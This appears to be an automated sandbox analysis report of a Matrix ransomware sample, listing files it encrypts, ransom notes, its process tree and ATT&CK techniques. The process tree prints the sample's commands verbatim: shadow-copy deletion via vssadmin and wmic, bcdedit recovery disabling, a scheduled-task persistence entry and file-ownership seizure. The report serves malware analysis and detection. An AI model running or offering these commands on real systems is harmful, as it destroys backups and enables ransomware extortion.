3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\bin\j2pcsc.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libaribcam_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\libvlccore.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\logger\libfile_logger_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\bckgzm.exe.mui 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\he.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Chess\en-US\Chess.exe.mui 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Hearts\ja-JP\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_display_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2528 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeIOtPzdjO64.exepid process 1932 powershell.exe 772 IOtPzdjO64.exe 772 IOtPzdjO64.exe 772 IOtPzdjO64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
IOtPzdjO64.exepid process 772 IOtPzdjO64.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exeIOtPzdjO64.exevssvc.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 772 IOtPzdjO64.exe Token: SeLoadDriverPrivilege 772 IOtPzdjO64.exe Token: SeBackupPrivilege 3784 vssvc.exe Token: SeRestorePrivilege 3784 vssvc.exe Token: SeAuditPrivilege 3784 vssvc.exe Token: SeIncreaseQuotaPrivilege 2024 WMIC.exe Token: SeSecurityPrivilege 2024 WMIC.exe Token: SeTakeOwnershipPrivilege 2024 WMIC.exe Token: SeLoadDriverPrivilege 2024 WMIC.exe Token: SeSystemProfilePrivilege 2024 WMIC.exe Token: SeSystemtimePrivilege 2024 WMIC.exe Token: SeProfSingleProcessPrivilege 2024 WMIC.exe Token: SeIncBasePriorityPrivilege 2024 WMIC.exe Token: SeCreatePagefilePrivilege 2024 WMIC.exe Token: SeBackupPrivilege 2024 WMIC.exe Token: SeRestorePrivilege 2024 WMIC.exe Token: SeShutdownPrivilege 2024 WMIC.exe Token: SeDebugPrivilege 2024 WMIC.exe Token: SeSystemEnvironmentPrivilege 2024 WMIC.exe Token: SeRemoteShutdownPrivilege 2024 WMIC.exe Token: SeUndockPrivilege 2024 WMIC.exe Token: SeManageVolumePrivilege 2024 WMIC.exe Token: 33 2024 WMIC.exe Token: 34 2024 WMIC.exe Token: 35 2024 WMIC.exe Token: SeIncreaseQuotaPrivilege 2024 WMIC.exe Token: SeSecurityPrivilege 2024 WMIC.exe Token: SeTakeOwnershipPrivilege 2024 WMIC.exe Token: SeLoadDriverPrivilege 2024 WMIC.exe Token: SeSystemProfilePrivilege 2024 WMIC.exe Token: SeSystemtimePrivilege 2024 WMIC.exe Token: SeProfSingleProcessPrivilege 2024 WMIC.exe Token: SeIncBasePriorityPrivilege 2024 WMIC.exe Token: SeCreatePagefilePrivilege 2024 WMIC.exe Token: SeBackupPrivilege 2024 WMIC.exe Token: SeRestorePrivilege 2024 WMIC.exe Token: SeShutdownPrivilege 2024 WMIC.exe Token: SeDebugPrivilege 2024 WMIC.exe Token: SeSystemEnvironmentPrivilege 2024 WMIC.exe Token: SeRemoteShutdownPrivilege 2024 WMIC.exe Token: SeUndockPrivilege 2024 WMIC.exe Token: SeManageVolumePrivilege 2024 WMIC.exe Token: 33 2024 WMIC.exe Token: 34 2024 WMIC.exe Token: 35 2024 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.execmd.execmd.execmd.exewscript.execmd.execmd.exedescription pid process target process PID 2480 wrote to memory of 2124 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2124 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2124 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2124 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 3068 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe NW0K8i8z.exe PID 2480 wrote to memory of 3068 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe NW0K8i8z.exe PID 2480 wrote to memory of 3068 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe NW0K8i8z.exe PID 2480 wrote to memory of 3068 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe NW0K8i8z.exe PID 2480 wrote to memory of 2496 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2496 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2496 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 2496 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2496 wrote to memory of 1932 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 1932 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 1932 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 1932 2496 cmd.exe powershell.exe PID 2480 wrote to memory of 1680 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1680 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1680 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1680 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1928 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1928 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1928 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 1928 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 1680 wrote to memory of 1664 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1664 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1664 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1664 1680 cmd.exe reg.exe PID 1928 wrote to memory of 1164 1928 cmd.exe wscript.exe PID 1928 wrote to memory of 1164 1928 cmd.exe wscript.exe PID 1928 wrote to memory of 1164 1928 cmd.exe wscript.exe PID 1928 wrote to memory of 1164 1928 cmd.exe wscript.exe PID 1680 wrote to memory of 932 1680 cmd.exe reg.exe PID 1680 wrote to memory of 932 1680 cmd.exe reg.exe PID 1680 wrote to memory of 932 1680 cmd.exe reg.exe PID 1680 wrote to memory of 932 1680 cmd.exe reg.exe PID 2480 wrote to memory of 528 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 528 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 528 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 2480 wrote to memory of 528 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe cmd.exe PID 1680 wrote to memory of 1516 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1516 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1516 1680 cmd.exe reg.exe PID 1680 wrote to memory of 1516 1680 cmd.exe reg.exe PID 1164 wrote to memory of 4052 1164 wscript.exe cmd.exe PID 1164 wrote to memory of 4052 1164 wscript.exe cmd.exe PID 1164 wrote to memory of 4052 1164 wscript.exe cmd.exe PID 1164 wrote to memory of 4052 1164 wscript.exe cmd.exe PID 528 wrote to memory of 3036 528 cmd.exe attrib.exe PID 528 wrote to memory of 3036 528 cmd.exe attrib.exe PID 528 wrote to memory of 3036 528 cmd.exe attrib.exe PID 528 wrote to memory of 3036 528 cmd.exe attrib.exe PID 4052 wrote to memory of 2420 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2420 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2420 4052 cmd.exe schtasks.exe PID 4052 wrote to memory of 2420 4052 cmd.exe schtasks.exe PID 528 wrote to memory of 2932 528 cmd.exe cacls.exe PID 528 wrote to memory of 2932 528 cmd.exe cacls.exe PID 528 wrote to memory of 2932 528 cmd.exe cacls.exe PID 528 wrote to memory of 2932 528 cmd.exe cacls.exe PID 528 wrote to memory of 3520 528 cmd.exe takeown.exe PID 528 wrote to memory of 3520 528 cmd.exe takeown.exe PID 528 wrote to memory of 3520 528 cmd.exe takeown.exe PID 528 wrote to memory of 3520 528 cmd.exe takeown.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe" "C:\Users\Admin\AppData\Local\Temp\NW0K8i8z.exe"2⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\NW0K8i8z.exe"C:\Users\Admin\AppData\Local\Temp\NW0K8i8z.exe" -n2⤵
- Executes dropped EXE
PID:3068
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\G2QMME20.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IJgd5MGr.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IJgd5MGr.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1664
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\FhBM387x.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\FhBM387x.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\cBHaOIiq.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\cBHaOIiq.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3424
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vLqR7Zgy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Views/modifies file attributes
PID:3036
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:2932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:3520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IOtPzdjO.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\IOtPzdjO.exeIOtPzdjO.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1360 -
C:\Users\Admin\AppData\Local\Temp\IOtPzdjO64.exeIOtPzdjO.exe -accepteula "ENUtxt.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A3F7BDEC-68D6-46C3-B179-1D19F71258F1} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]1⤵PID:3652
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\cBHaOIiq.bat"2⤵PID:592
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2528
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3660
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3772
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:4036
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5a6384e8afff606dc3865f7cbfc2d1a6a
SHA163bb22bc3dc671e495c6359a4a4b66bf87653804
SHA2566ca71f582e1be8b862cbdfcf1aa75e3dcbd81f928ce548a3e6071b871240eaf3
SHA512d6e3e66a6e01cd37c8f131e257a6d3d7792ac9a25b09a8503858cbc3374a39d36eee4ce2556c8e6849c4e88012a70a1731b4469a522af5bdd8288a3801ca7f81
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
3.8MB
MD5ac42a9b2338847bb398152b1bf6401fd
SHA102daf9ff6773da4d134c94fdb7630af2cc01e399
SHA2563eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
SHA512016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
Filesize
3.8MB
MD5ac42a9b2338847bb398152b1bf6401fd
SHA102daf9ff6773da4d134c94fdb7630af2cc01e399
SHA2563eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
SHA512016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
Filesize
30KB
MD5c2788b344a6f02791259e8808ffd06db
SHA1e7dfaff36d26767ac4e79ac3895c7c1afeabec0b
SHA2561b831eda26eed6118b79ab3695cd5e6d3fbcb98b05bcf5374ec04da6ea040384
SHA5120f03360cbe6560077d4f443582e161ae042927e5c0a6a7276c9ea0a7e19fb5d78262f7691b9e260e413ec455578bfcad727d2c48b919a6e18d9f2e62e89bee2d
-
Filesize
246B
MD50eedd651ff6127539a01cef9eaf211dc
SHA1b377ef41276cba00415efd1b00a4158fb3d40996
SHA256437eeceaa4d8e8fad425e1aa111f1d3277a9817f9796f387a4f35290bba59e5a
SHA5122718577b5c304f49d0d17a108fa86b1379c76a0ea8093995995609e391f84951f6429895846f5b7e349cfdb40f021e6e047d15b045d869b375f966af1a993350
-
Filesize
246B
MD50eedd651ff6127539a01cef9eaf211dc
SHA1b377ef41276cba00415efd1b00a4158fb3d40996
SHA256437eeceaa4d8e8fad425e1aa111f1d3277a9817f9796f387a4f35290bba59e5a
